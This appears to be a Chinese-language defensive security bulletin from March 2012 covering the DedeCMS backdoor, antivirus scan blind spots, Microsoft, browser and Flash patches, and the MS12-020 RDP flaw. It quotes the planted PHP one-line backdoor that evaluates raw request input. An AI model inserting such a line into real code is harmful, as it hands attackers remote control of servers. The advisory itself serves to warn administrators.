文/鄭先偉

內(nèi)容管理系統(tǒng)曝“一句話”后門

文/鄭先偉

3月是開學(xué)的第一個(gè)月，教育網(wǎng)整體運(yùn)行平穩(wěn)，未發(fā)生影響嚴(yán)重的安全事件，不過，開學(xué)后安全投訴事件的數(shù)量較寒假期間有了較大的增長。

CMS存在后門程序影響服務(wù)器安全

值得關(guān)注的是一個(gè)名叫DedeCMS（中文名：織夢）的免費(fèi)開源CMS系統(tǒng)傳出被放置了“一句話”后門程序。黑客在該系統(tǒng)某些版本中的shopcar.class.php文件中植入一句后門代碼“@eval(file_get_contents('php://input'));”。利用這個(gè)被插入了代碼的網(wǎng)頁，黑客只需要遠(yuǎn)程構(gòu)造簡單的數(shù)據(jù)包并提交給服務(wù)器，就能夠獲取到該網(wǎng)站的WebShell，再向服務(wù)器上傳PHP木馬程序，就有可能完全控制相關(guān)的服務(wù)器。從目前我們掌握的情況看，有不少學(xué)校的網(wǎng)站是使用這款免費(fèi)的系統(tǒng)搭建的，黑客通過搜索引擎很容易定位出有問題的網(wǎng)站地址。我們建議使用開源CMS系統(tǒng)搭建網(wǎng)站的管理員應(yīng)該盡快修改升級自己網(wǎng)站的代碼，或者使用一些其他的防護(hù)手段（如使用專用的Web防火墻等）進(jìn)行防護(hù)。

多款殺毒軟件存在查殺真空區(qū)

近期沒有新增危害特別嚴(yán)重的木馬病毒程序。值得注意的是多款殺毒軟件被曝出存在查殺真空區(qū)，原因是這些殺毒軟件所用的查殺引擎為了提高掃描速度對一些特定格式文件中的某些字段做了標(biāo)志，當(dāng)掃描到有這些特殊標(biāo)志的文件時(shí)就認(rèn)為是系統(tǒng)的合法文件而不進(jìn)行掃描，這就導(dǎo)致如果病毒也采用這種格式并且在特定字段上也放置相應(yīng)的標(biāo)志就能成功地躲過殺毒軟件的查殺。目前國內(nèi)國外的多款殺毒軟件都發(fā)現(xiàn)存在類似的問題，建議用戶隨時(shí)關(guān)注軟件版本的更新。

近期新增嚴(yán)重漏洞評述

微軟3月份發(fā)布6個(gè)安全公告，其中一個(gè)為嚴(yán)重等級，4個(gè)為重要等級，1個(gè)為中等等級，共修復(fù)了Windows操作系統(tǒng)、Visual Studio開發(fā)工具和Expression Design繪圖編輯工具等多個(gè)產(chǎn)品中存在的7處安全漏洞，用戶應(yīng)該盡快使用系統(tǒng)自帶的更新功能安裝相應(yīng)的補(bǔ)丁程序。

瀏覽器方面，Google的Chrome瀏覽器發(fā)布最新版本17.0.963.83，修補(bǔ)之前版本中的多個(gè)安全漏洞（http://www.google.cn/chrome/）。Mozilla公司發(fā)布Firefox瀏覽器的安全補(bǔ)丁更新，修補(bǔ)之前版本中的多個(gè)安全漏洞（https://www.mozilla.org/security/announce/2012/mfsa2012-19.html）。使用上述瀏覽器的用戶應(yīng)盡快使用軟件自帶的安全更新功能進(jìn)行升級。

瀏覽器插件方面，Adobe公司發(fā)布了Flash Player的補(bǔ)丁程序，修補(bǔ)之前版本中的兩個(gè)遠(yuǎn)程代碼執(zhí)行漏洞（http://www.adobe.com/support/security/bulletins/apsb12-05.html）。

Windows遠(yuǎn)程桌面協(xié)議RDP遠(yuǎn)程代碼執(zhí)行及拒絕服務(wù)攻擊漏洞（MS12-020)

影響系統(tǒng)

Windows XP

Windows 2003

Windows 2008

Windows Vista

Windows 7

漏洞信息

Windows遠(yuǎn)程桌面服務(wù)（RDP，Remote Desktop Protocol）是Windows系統(tǒng)自帶的用于提供遠(yuǎn)程操作Windows系統(tǒng)的服務(wù)，默認(rèn)的服務(wù)端口為3389。

Windows RDP服務(wù)程序在實(shí)現(xiàn)上存在錯誤，沒有有效的定義及回收內(nèi)存，導(dǎo)致一些特定的內(nèi)存在釋放后沒有得到有效回收，攻擊者可以構(gòu)造特定的數(shù)據(jù)覆蓋這些內(nèi)存空間，隨后引用這些內(nèi)存中的指令。成功的遠(yuǎn)程攻擊者在未經(jīng)認(rèn)證的情況下往服務(wù)器發(fā)送畸形惡意的數(shù)據(jù)包，便可以以系統(tǒng)權(quán)限或者NET SERVICE權(quán)限執(zhí)行任意命令。

漏洞危害

這個(gè)漏洞是近年來少有的能夠通過網(wǎng)絡(luò)開放端口直接遠(yuǎn)程利用的漏洞，它可以被用來進(jìn)行蠕蟲病毒的傳播。雖然微軟號稱是從秘密渠道獲得漏洞信息，但是提供這些漏洞信息的是一個(gè)有名的黑客組織，因此不排除漏洞信息實(shí)際已經(jīng)在黑客組織地下流傳。目前互聯(lián)網(wǎng)上已經(jīng)公布該漏洞拒絕服務(wù)攻擊的代碼（測試后能夠?qū)е侣┒粗鳈C(jī)藍(lán)屏），遠(yuǎn)程代碼執(zhí)行的攻擊代碼很可能在近期就會被公布。建議管理員或用戶應(yīng)該盡快安裝相應(yīng)的補(bǔ)丁程序。

解決辦法

目前廠商已經(jīng)針對該漏洞發(fā)布相應(yīng)的安全公告和補(bǔ)丁程序，我們建議用戶盡快安裝相應(yīng)的補(bǔ)丁程序：

http://www.microsoft.com/technet/security/bulletin/MS12-020.asp

（作者單位為中國教育和科研計(jì)算機(jī)網(wǎng)應(yīng)急響應(yīng)組）